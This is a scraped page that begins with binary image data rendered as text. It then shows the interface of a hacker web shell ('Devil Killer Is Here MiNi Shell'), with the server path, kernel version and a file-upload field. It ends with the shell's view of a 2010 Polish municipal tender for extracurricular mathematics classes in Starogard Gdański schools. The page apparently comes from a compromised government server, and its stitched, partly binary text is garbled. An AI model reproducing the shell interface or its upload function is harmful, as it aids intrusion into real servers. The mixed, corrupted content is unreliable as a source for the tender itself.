JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100818/255150-N-2010.html

<p class="kh_header"><b>Starogard Gdański: PROWADZENIE ZAJĘĆ DYDAKTYCZNO - WYRÓWNAWCZYCH I ROZSZERZAJĄCYCH Z MATEMATYKI W RAMACH PROJEKTU DODATKOWE ZAJĘCIA POZALEKCYJNE</b><br>
<b>Numer ogłoszenia: 255150 - 2010; data zamieszczenia: 18.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Starogard Gdański , ul. Gdańska 6, 83-200 Starogard Gdański, woj. pomorskie, tel. 058 5306006, faks 058 5306111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starogard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PROWADZENIE ZAJĘĆ DYDAKTYCZNO - WYRÓWNAWCZYCH I ROZSZERZAJĄCYCH Z MATEMATYKI W RAMACH PROJEKTU DODATKOWE ZAJĘCIA POZALEKCYJNE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie pozalekcyjnych zajęć z matematyki: dydaktyczno - wyrównawczych i rozszerzających dla uczniów Publicznej Szkoły Podstawowej Nr 3 i Publicznego Gimnazjum Nr 3 w Starogardzie Gdańskim oraz dydaktyczno - wyrównawczych w Publicznym Gimnazjum Nr 2 w ramach projektu Dodatkowe zajęcia pozalekcyjne.
1.2. Pozalekcyjne zajęcia z matematyki w Publicznej Szkole Podstawowej Nr 3 zaplanowane są w wymiarze:
a)	dydaktyczno - wyrównawcze:
w 2010 r. - 42 godziny,
w 2011 r. - 96 godzin,
w 2012 r. - 54 godziny,
b)	rozszerzające:
w 2010 r. - 98 godzin,
w 2011 r. - 224 godziny,
w 2012 r. - 126 godzin.
1.3. Pozalekcyjne zajęcia z matematyki w Publicznym Gimnazjum Nr 3 zaplanowane są w wymiarze:
a)	dydaktyczno - wyrównawcze:
w 2010 r. - 91 godzin,
w 2011 r. - 224 godziny,
w 2012 r. - 133 godziny,
b)	rozszerzające:
w 2010 r. - 13 godzin,
w 2011 r. - 32 godziny,
w 2012 r. - 19 godzin.
1.4. Pozalekcyjne zajęcia z matematyki w Publicznym Gimnazjum Nr 2 zaplanowane są w wymiarze:
a)	dydaktyczno - wyrównawcze:
w 2010 r. - 15 godzin,
w 2011 r. - 30 godzin,
w 2012 r. - 19 godzin,
1.5. Świadczenie usług o których mowa w pkt 1.1 odbywać się będzie pomiędzy godziną 8.00 a 19.00, z uwzględnieniem dni wolnych od nauki szkolnej, przerw wakacyjnych, świątecznych i ferii oraz ewentualnych przerw w nauce. 
1.6. Terminy świadczenia usług objętych niniejszym zamówieniem nie mogą kolidować z obowiązkowymi zajęciami szkolnymi uczniów uczestniczących w zajęciach.  
1.7. Ogólne dane o projekcie:
a) Projekt obejmuje realizację Dodatkowych zajęć pozalekcyjnych w dwóch szkołach podstawowych i trzech gimnazjalnych znajdujących się na terenie Gminy Miejskiej Starogard Gdański (tj. zajęcia korekcyjno-kompensacyjne, zajęcia z języka angielskiego i niemieckiego, zajęcia dydaktyczno-wyrównawcze, zajęcia z nauk przyrodniczo-matematycznych, z informatyki,     z przedsiębiorczości).
b) Realizacja projektu ma na celu wyrównywanie szans edukacyjnych uczniów i zmniejszanie dysproporcji w ich osiągnięciach edukacyjnych. Nastąpi to poprzez zorganizowanie dodatkowych zajęć dydaktyczno-wyrównawczych i specjalistycznych oraz dodatkowych ukierunkowanych na rozwój kompetencji kluczowych w 5 starogardzkich szkołach tj. w Publicznej Szkole Podstawowej Nr 2, w Publicznej Szkole Podstawowej Nr 3, w Publicznym Gimnazjum Nr 1, w Publicznym Gimnazjum Nr 2, w Publicznym Gimnazjum Nr 3. Celem głównym projektu jest zwiększenie szans uczniów starogardzkich szkół na otrzymanie jak najlepszego wykształcenia poprzez możliwość korzystania z dodatkowych, bezpłatnych zajęć.
1.8. Inne postanowienia dotyczące przedmiotu zamówienia:
1.	 Zamawiający zapewnia pomieszczenia i sprzęt konieczny do realizacji zamówienia,
2.	 Przez 1 godzinę zajęć rozumie się 1 godzinę lekcyjną, tj. 45 minut,
3.	 Wykonawca ponosi pełną odpowiedzialność za uczniów w czasie trwania zajęć,
4.	 Wykonawca zobowiązany jest:
a)	Świadczyć usługę objętą niniejszym zamówieniem zgodnie z projektem pn. Dodatkowe zajęcia pozalekcyjne, zgodnie z zaakceptowanym wnioskiem o dofinansowanie Projektu,
b)	Wykonawca zobowiązany jest opracować plan pracy w uzgodnieniu w właściwym Asystentem Szkolnym na co najmniej 5 dni przed rozpoczęciem zajęć,
c)	Wykonawca zobowiązany jest opracować szczegółowy harmonogram prowadzenia zajęć w właściwym dla danej szkoły Asystentem Szkolnym Projektu,
d)	Wszelkie zmiany harmonogramu o których mowa w lit. C wynikające z zaistnienia ważnych powodów należy uzgadniać z właściwym Asystentem Szkolnym.
1.9. Opis dodatkowy
1. Wykonawca zobowiązuje się do osobistego wykonania pracy; nie może powierzyć całości lub części pracy określonej w umowie do wykonania przez osoby trzecie bez pisemnej zgody Zamawiającego.
2. Z Wykonawcą będzie podpisana umowa zlecenia.
3. Zamawiający zastrzega sobie możliwość prowadzenia bieżącej kontroli, nad realizacją zamówienia w okresie obowiązywania umowy.
4. Rozliczenie za wykonanie przedmiotu zamówienia następować będzie cyklicznie, nie częściej niż raz na miesiąc, na zasadach określonych we wzorze umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony o ile wykonawca wykaże, iż dysponuje przynajmniej jedną osobą, która:
a)	posiada wykształcenie upoważniające do nauczania matematyki w danym typie szkoły,
b)	posiada stopień awansu zawodowego minimum nauczyciela kontraktowego,
c)	posiada co najmniej 2-letni staż pracy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.starogard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego, pok 211.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2010 godzina 14:00, miejsce: Siedziba zamawiającego, pok nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  jest współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, priorytetu IX. Rozwój wykształcenia i kompetencji w regionach..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zajęcia dydaktyczno - wyrównawcze w Publicznej Szkole Podstawowej Nr 3;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 192 godziny w okresie od IX 2010 do VI 2012, tj.: w 2010 r. - 42 godziny, w 2011r. - 96 godzin, w 2012 r. - 54 godziny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zajęcia rozszerzające prowadzone w Publicznej Szkole Podstawowej Nr 3 - ZAKRES A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 192 godziny w okresie od IX 2010 do VI 2012, tj.: w 2010 r.- 42 godziny, w 2011r. - 96 godzin, w 2012 r. - 54 go.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zajęcia rozszerzające prowadzone w Publicznej Szkole Podstawowej Nr 3 - ZAKRES B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 128 godzin w okresie od IX 2010 do VI 2012, tj.: w 2010 r.- 28 godzin, w 2011r. - 64 godziny, w 2012 r. - 36 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zajęcia rozszerzające prowadzone w Publicznej Szkole Podstawowej Nr 3 - ZAKRES C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 128 godzin w okresie od IX 2010 do VI 2012, tj.: w 2010 r.- 28 godzin, w 2011r. - 64 godziny, w 2012 r. - 36 go.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zajęcia dydaktyczno - wyrównawcze prowadzone w Publicznym Gimnazjum Nr 3 - ZAKRES A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 64 godziny w okresie od IX 2010 do VI 2012, tj.: w 2010 r. - 13 godzin, w 2011r. - 32 godziny, w 2012 r. - 19 godzin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zajęcia dydaktyczno - wyrównawcze w Publicznym Gimnazjum Nr 3 - ZAKRES B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 64 godziny w okresie od IX 2010 do VI 2012, tj.:  w 2010 r. - 26 godzin, w 2011r. - 38 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> zajęcia dydaktyczno - wyrównawcze prowadzone w Publicznym Gimnazjum Nr3 - ZAKRES C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 96 godzin w okresie od IX 2010 do VI 2012, tj.: w 2010 r. - 13 godzin, w 2011r. - 45 godzin, w 2012 r. - 38 godzin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> zajęcia dydaktyczno - wyrównawcze prowadzone w Publicznym Gimnazjum Nr3 - ZAKRES D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 96 godzin w okresie od IX 2010 do VI 2012, tj.: w 2010 r. - 13 godzin, w 2011r. - 45 godzin, w 2012 r. - 38 godzin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> zajęcia dydaktyczno - wyrównawcze prowadzone w Publicznym Gimnazjum Nr3 - ZAKRES E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 128 godzin w okresie od IX 2010 do VI 2012, tj.: w 2010 r. - 26 godzin, w 2011r. - 64 godziny, w 2012 r. - 38 godzin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> zajęcia rozszerzające prowadzone w Publicznym Gimnazjum Nr 3;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 64 godziny w okresie od IX 2010 do VI 2012, tj.: w 2010 r. - 13 godzin, w 2011r. - 32 godziny, w 2012 r. - 19 godzin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> zajęcia rozszerzające prowadzone w Publicznym Gimnazjum Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 64 godziny w okresie od IX 2010 do VI 2012, tj.: w 2010 r. - 15 godzin, w 2011r. - 30 godziny, w 2012 r. - 19 godzin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com